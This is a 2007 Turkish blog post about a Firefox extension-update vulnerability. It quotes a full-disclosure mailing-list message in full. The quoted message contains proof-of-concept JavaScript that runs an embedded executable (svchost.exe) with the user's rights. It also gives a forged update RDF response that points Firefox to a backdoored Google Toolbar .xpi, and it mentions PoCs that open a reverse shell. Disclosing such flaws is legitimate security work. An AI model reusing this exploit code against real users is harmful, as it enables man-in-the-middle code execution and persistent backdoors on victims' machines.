Menüyü Gizle

Firefox Hash

Etiketler exploit, hash, firefox, 21.05.2007

Firefox advisory MD5 hash : 1A0E6F146C273A1D7513392A1DEB12F0

Bundan, bundan ve bundan sonra artik böyle :)

Yorum Ekle Yorumunu Ekle - Yazıcı Versiyonu Yazıcı Versiyonu - Yorumlar için RSS Yorumlar için RSS

Ferruh Mavituna - 12.02.2008

http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0535.html

Very good and detailed advisory,
I came up with the same issue about one month ago and developed two PoCs.

Here is the hash :http://ferruh.mavituna.com/makale/firefox-hash/ (shame on
me that I haven't sent to any public mail-list. If you really curious check
out RSS caches and google cache) and brief explanation is in the attachment
(Firefox-MITM.txt).

I attached Google Toolbar PoC. Be careful it's throwing a reverse shell also
I got a PoC for Linux as well.

To clarify things, you can execute arbitrary code with current user's
rights.

Here is a sample code,
--------------------
exepath = Components.classes["mozilla.org/file/directory_service;1"].getService(
Components.interfaces.nsIProperties).get("ProfD",
Components.interfaces.nsIFile).path +
"\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe";
runFile(exepath);

function runFile(f) {
var file = Components.classes["mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);

file.initWithPath(f);

var process = Components.classes["mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);

process.init(file);

var args = [""];
process.run(false, args, args.length);
}

--------------------

Sample update response XML,
----------
<?xml version="1.0"?><RDF:RDF xmlns:RDF="
http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="
http://www.mozilla.org/2004/em-rdf#">
<RDF:Description
about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}">
<em:updates><RDF:Seq>
<RDF:li
resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:
4.0.0.16"/>
</RDF:Seq></em:updates></RDF:Description>
<RDF:Description
about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16
">
<em:version>4.0.0.16</em:version>
<em:targetApplication><RDF:Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.5.0</em:minVersion>
<em:maxVersion>2.9.99</em:maxVersion>
<em:updateLink>http://192.168.1.130/firefox/google.xpi</em:updateLink>
</RDF:Description></em:targetApplication></RDF:Description>
</RDF:RDF>
----------
This is our backdoored xpi file url :
http://192.168.1.130/firefox/google.xpi
I modified the google-toolbar.xul and added to run svchost.exe file which is
in xpi file as well.

Sample xpi file attached, modified version of google toolbar extension and
it will work every time you launch Firefox.

SW - 21.05.2007

ha söyle ya; sadece firmanin kendisi kadar güvenliklerine dikkat etsen yeter:)

Yorum Yazın


Tüm yorumlar onaydan geçmektedir, bu işlem en uzun 30 dk. sürecektir. E-mail adresleri yeni yorumları bildirme harici hiç bir başka amaçla kullanılmamaktadır ve sitede gözükmemektedir.



Captcha Kodu